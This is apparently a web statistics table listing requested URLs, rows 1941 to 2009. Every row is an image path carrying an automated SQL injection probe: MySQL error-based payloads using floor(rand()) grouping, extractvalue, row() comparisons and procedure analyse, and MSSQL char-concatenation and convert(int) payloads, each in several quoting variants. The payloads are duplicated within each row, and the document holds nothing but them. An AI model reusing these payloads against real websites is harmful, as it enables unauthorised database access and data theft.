1941. | 1 | balance.gif' and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'emuc'='emuc //slike//stran_1 AND 5486/balance.gif' and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'emuc'='emuc |
1942. | 1 | balance.gif') and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('zfom' like 'zfom //slike//stran_1 AND 5486/balance.gif') and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('zfom' like 'zfom |
1943. | 1 | balance.gif%' and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'jvxi%'='jvxi //slike//stran_1 AND 5486/balance.gif%' and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'jvxi%'='jvxi |
1944. | 1 | balance.gif' and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'pciw' like 'pciw //slike//stran_1 AND 5486/balance.gif' and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'pciw' like 'pciw |
1945. | 1 | balance.gif") and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("ttxs"="ttxs //slike//stran_1 AND 5486/balance.gif") and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("ttxs"="ttxs |
1946. | 1 | balance.gif" and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "xovc"="xovc //slike//stran_1 AND 5486/balance.gif" and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "xovc"="xovc |
1947. | 1 | balance.gif and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- qfdl //slike//stran_1 AND 5486/balance.gif and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- qfdl |
1948. | 1 | balance.gif) and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and (7838=7838 //slike//stran_1 AND 5486/balance.gif) and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and (7838=7838 |
1949. | 1 | balance.gif)) and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ((1510=1510 //slike//stran_1 AND 5486/balance.gif)) and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ((1510=1510 |
1950. | 1 | balance.gif and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) //slike//stran_1 AND 5486/balance.gif and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) |
1951. | 1 | balance.gif') and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ('rsob'='rsob //slike//stran_1 AND 5486/balance.gif') and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ('rsob'='rsob |
1952. | 1 | balance.gif')) and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and (('zijj'='zijj //slike//stran_1 AND 5486/balance.gif')) and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and (('zijj'='zijj |
1953. | 1 | balance.gif' and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and 'gkrz'='gkrz //slike//stran_1 AND 5486/balance.gif' and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and 'gkrz'='gkrz |
1954. | 1 | balance.gif') and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ('xvpb' like 'xvpb //slike//stran_1 AND 5486/balance.gif') and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ('xvpb' like 'xvpb |
1955. | 1 | balance.gif%' and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and 'qpur%'='qpur //slike//stran_1 AND 5486/balance.gif%' and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and 'qpur%'='qpur |
1956. | 1 | balance.gif' and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and 'qdbg' like 'qdbg //slike//stran_1 AND 5486/balance.gif' and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and 'qdbg' like 'qdbg |
1957. | 1 | balance.gif") and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ("spnj"="spnj //slike//stran_1 AND 5486/balance.gif") and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and ("spnj"="spnj |
1958. | 1 | balance.gif" and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and "vilc"="vilc //slike//stran_1 AND 5486/balance.gif" and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671)) and "vilc"="vilc |
1959. | 1 | balance.gif and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671))-- dieb //slike//stran_1 AND 5486/balance.gif and extractvalue(4067,concat(0x5c,0x7170767171,(select (elt(4067=4067,1))),0x716b627671))-- dieb |
1960. | 1 | balance.gif) and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and (4016=4016 //slike//stran_1 AND 5486/balance.gif) and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and (4016=4016 |
1961. | 1 | balance.gif)) and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ((9718=9718 //slike//stran_1 AND 5486/balance.gif)) and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ((9718=9718 |
1962. | 1 | balance.gif and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) //slike//stran_1 AND 5486/balance.gif and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) |
1963. | 1 | balance.gif') and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ('fvsa'='fvsa //slike//stran_1 AND 5486/balance.gif') and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ('fvsa'='fvsa |
1964. | 1 | balance.gif')) and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and (('mpzm'='mpzm //slike//stran_1 AND 5486/balance.gif')) and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and (('mpzm'='mpzm |
1965. | 1 | balance.gif' and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and 'tyrv'='tyrv //slike//stran_1 AND 5486/balance.gif' and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and 'tyrv'='tyrv |
1966. | 1 | balance.gif') and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ('irbf' like 'irbf //slike//stran_1 AND 5486/balance.gif') and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ('irbf' like 'irbf |
1967. | 1 | balance.gif%' and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and 'hwhd%'='hwhd //slike//stran_1 AND 5486/balance.gif%' and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and 'hwhd%'='hwhd |
1968. | 1 | balance.gif' and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and 'xtwq' like 'xtwq //slike//stran_1 AND 5486/balance.gif' and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and 'xtwq' like 'xtwq |
1969. | 1 | (select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ("iaic"="iaic','','scrollbars=1,resizable=1');">balance.gif") and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ("iaic"="iaic //slike//stran_1 AND 5486/balance.gif") and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and ("iaic"="iaic |
1970. | 1 | (select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and "mblk"="mblk','','scrollbars=1,resizable=1');">balance.gif" and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and "mblk"="mblk //slike//stran_1 AND 5486/balance.gif" and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x) and "mblk"="mblk |
1971. | 1 | balance.gif and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x)-- hwvb //slike//stran_1 AND 5486/balance.gif and row(9515,5561)>(select count(*),concat(0x7170767171,(select (elt(9515=9515,1))),0x716b627671,floor(rand(0)*2))x from (select 6668 union select 8989 union select 2042 union select 5971)a group by x)-- hwvb |
1972. | 1 | balance.gif) and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (9570=9570 //slike//stran_1 AND 5486/balance.gif) and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (9570=9570 |
1973. | 1 | balance.gif)) and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ((3122=3122 //slike//stran_1 AND 5486/balance.gif)) and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ((3122=3122 |
1974. | 1 | balance.gif and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) //slike//stran_1 AND 5486/balance.gif and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) |
1975. | 1 | balance.gif') and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('tzub'='tzub //slike//stran_1 AND 5486/balance.gif') and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('tzub'='tzub |
1976. | 1 | balance.gif')) and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (('lnrt'='lnrt //slike//stran_1 AND 5486/balance.gif')) and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (('lnrt'='lnrt |
1977. | 1 | balance.gif' and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'vddl'='vddl //slike//stran_1 AND 5486/balance.gif' and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'vddl'='vddl |
1978. | 1 | balance.gif') and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('yiyn' like 'yiyn //slike//stran_1 AND 5486/balance.gif') and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('yiyn' like 'yiyn |
1979. | 1 | balance.gif%' and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'kvmb%'='kvmb //slike//stran_1 AND 5486/balance.gif%' and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'kvmb%'='kvmb |
1980. | 1 | balance.gif' and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'vflp' like 'vflp //slike//stran_1 AND 5486/balance.gif' and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'vflp' like 'vflp |
1981. | 1 | balance.gif") and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ("ojfw"="ojfw //slike//stran_1 AND 5486/balance.gif") and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ("ojfw"="ojfw |
1982. | 1 | balance.gif" and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and "fbbr"="fbbr //slike//stran_1 AND 5486/balance.gif" and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and "fbbr"="fbbr |
1983. | 1 | balance.gif and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113)))-- lrzv //slike//stran_1 AND 5486/balance.gif and 2634 in (select (char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (2634=2634) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113)))-- lrzv |
1984. | 1 | balance.gif) and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (7227=7227 //slike//stran_1 AND 5486/balance.gif) and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (7227=7227 |
1985. | 1 | balance.gif)) and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ((2871=2871 //slike//stran_1 AND 5486/balance.gif)) and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ((2871=2871 |
1986. | 1 | balance.gif and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) //slike//stran_1 AND 5486/balance.gif and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) |
1987. | 1 | balance.gif') and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('dzxu'='dzxu //slike//stran_1 AND 5486/balance.gif') and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('dzxu'='dzxu |
1988. | 1 | balance.gif')) and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (('qupc'='qupc //slike//stran_1 AND 5486/balance.gif')) and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and (('qupc'='qupc |
1989. | 1 | balance.gif' and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'pujt'='pujt //slike//stran_1 AND 5486/balance.gif' and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'pujt'='pujt |
1990. | 1 | balance.gif') and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('odip' like 'odip //slike//stran_1 AND 5486/balance.gif') and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ('odip' like 'odip |
1991. | 1 | balance.gif%' and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'vkrw%'='vkrw //slike//stran_1 AND 5486/balance.gif%' and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'vkrw%'='vkrw |
1992. | 1 | balance.gif' and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'lmye' like 'lmye //slike//stran_1 AND 5486/balance.gif' and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and 'lmye' like 'lmye |
1993. | 1 | balance.gif") and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ("pduj"="pduj //slike//stran_1 AND 5486/balance.gif") and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and ("pduj"="pduj |
1994. | 1 | balance.gif" and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and "pqqz"="pqqz //slike//stran_1 AND 5486/balance.gif" and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113))) and "pqqz"="pqqz |
1995. | 1 | balance.gif and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113)))-- seog //slike//stran_1 AND 5486/balance.gif and 6413=convert(int,(select char(113)+char(112)+char(118)+char(113)+char(113)+(select (case when (6413=6413) then char(49) else char(48) end))+char(113)+char(107)+char(98)+char(118)+char(113)))-- seog |
1996. | 1 | balance.gif) and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and (9058=9058 //slike//stran_1 AND 5486/balance.gif) and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and (9058=9058 |
1997. | 1 | balance.gif)) and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ((8615=8615 //slike//stran_1 AND 5486/balance.gif)) and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ((8615=8615 |
1998. | 1 | balance.gif and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) //slike//stran_1 AND 5486/balance.gif and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) |
1999. | 1 | balance.gif') and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ('dznx'='dznx //slike//stran_1 AND 5486/balance.gif') and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ('dznx'='dznx |
2000. | 1 | balance.gif')) and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and (('kgmg'='kgmg //slike//stran_1 AND 5486/balance.gif')) and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and (('kgmg'='kgmg |
2001. | 1 | balance.gif' and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and 'qpbz'='qpbz //slike//stran_1 AND 5486/balance.gif' and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and 'qpbz'='qpbz |
2002. | 1 | balance.gif') and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ('dqbe' like 'dqbe //slike//stran_1 AND 5486/balance.gif') and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ('dqbe' like 'dqbe |
2003. | 1 | balance.gif%' and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and 'tqsy%'='tqsy //slike//stran_1 AND 5486/balance.gif%' and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and 'tqsy%'='tqsy |
2004. | 1 | balance.gif' and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and 'pltz' like 'pltz //slike//stran_1 AND 5486/balance.gif' and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and 'pltz' like 'pltz |
2005. | 1 | balance.gif") and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ("jeka"="jeka //slike//stran_1 AND 5486/balance.gif") and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and ("jeka"="jeka |
2006. | 1 | balance.gif" and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and "mvrx"="mvrx //slike//stran_1 AND 5486/balance.gif" and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113)) and "mvrx"="mvrx |
2007. | 1 | balance.gif and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113))-- wgec //slike//stran_1 AND 5486/balance.gif and 6814=concat(char(113)+char(112)+char(118)+char(113)+char(113),(select (case when (6814=6814) then char(49) else char(48) end)),char(113)+char(107)+char(98)+char(118)+char(113))-- wgec |
2008. | 1 | balance.gif) procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and (8492=8492 //slike//stran_1 AND 5486/balance.gif) procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and (8492=8492 |
2009. | 1 | balance.gif)) procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ((8091=8091 //slike//stran_1 AND 5486/balance.gif)) procedure analyse(extractvalue(7671,concat(0x5c,0x7170767171,(select (case when (7671=7671) then 1 else 0 end)),0x716b627671)),1) and ((8091=8091 |
